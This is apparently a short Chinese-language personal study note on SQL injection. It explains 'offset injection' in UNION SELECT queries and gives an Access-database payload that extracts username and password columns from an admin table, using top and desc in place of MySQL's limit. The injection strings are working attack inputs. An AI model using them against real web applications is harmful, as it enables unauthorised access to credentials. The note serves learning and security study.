注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!
偏移注入
偏移注入要注入的字段数,小于当前页面的字段数
select admin.*,1,2,3,4,5 from admin
假设admin表里面有三个字段id、username、password
=> select id,username,password,1,2,3,4,5 from admin 若显错位在3,4位置,则输出password,1
当我们偏移admin.*的话=> select 1,admin.*,2,3,4,5 from admin
=>select 1,id,username,password,2,3,4,5 from admin 则输出username,password
当我们接着偏移admin.*的话=> select 1,2,admin.*,3,4,5 from admin
=>select 1,2,id,username,password,3,4,5 from admin 则输出id,username
Access数据库排序
and 1=2 union select top 1 1,id,3,username,password,6 from admin order by id desc
top 取顶端第一条数据
desc 倒叙排列
通过这两个函数从而达到mysql数据库中limit查询的效果